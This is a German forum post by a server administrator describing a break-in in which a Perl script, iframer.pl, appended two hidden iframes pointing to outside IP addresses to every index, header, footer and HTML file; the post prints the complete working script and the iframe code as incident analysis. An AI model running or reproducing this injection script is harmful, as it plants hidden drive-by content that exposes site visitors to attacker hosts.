Heute hat es einen unserer Server erwischt. Ähnlich wie bei LonesomWolf wurden sehr viele Dateien überschrieben. Um genau zu sein: alle *index.php, *header.php, *footer.php, *.htm und *.html Dateien. Jeder dieser Dateien wurden zwei (2) iframes angehängt:
HTML-Code:
<iframe src="hXXp://124.217.252.62/~admin/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="hXXp://203.169.139.76/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
(http durch hXXp getauscht)
Durchgeführt wurde dies mithilfe eines perl scripts namens iframer.pl welche folgenden code enthält:
Code:
#!/usr/bin/perl
use File::Find;
$iframe = '<iframe src="http://124.217.252.62/~admin/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://203.169.139.76/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>';
sub process_file {
if($File::Find::name =~ /index\.php/i || $File::Find::name =~ /footer\.php/i || $File::Find::name =~ /header\.php/i || $File::Find::name =~/\.htm$/i || $File::Find::name =~/\.html$/i){
open(FILE,">>$File::Find::name");
print $File::Find::name."\r\n";
print FILE $iframe;
close(FILE);
}
}
find(\&process_file,@ARGV);
Die
Logfiles werden zur Zeit noch ausgewertet. Daher ist momentan noch unklar auf welche Weise diese iframer.pl auf den Server gelangt ist und wie sie ausgeführt wurde. Fest steht, dass der Angriff unmittelbar (innerhalb von ca.10 min und zeitgleich mit Listung in Google-Blog-Suche) nach einem neuen Blogpost per WordPress 2.5.1 erfolgte. Ob dies aber nur Zufall war oder ob tatsächlich ein Zusammenhang besteht ist derzeit ebenfalls noch unklar.
@LonesomWolf: bei welchem Provider liegt Dein Blog? Hast Du möglicherweise auch eine iframer.pl oder ähnliches auf den server gelegt bekommen?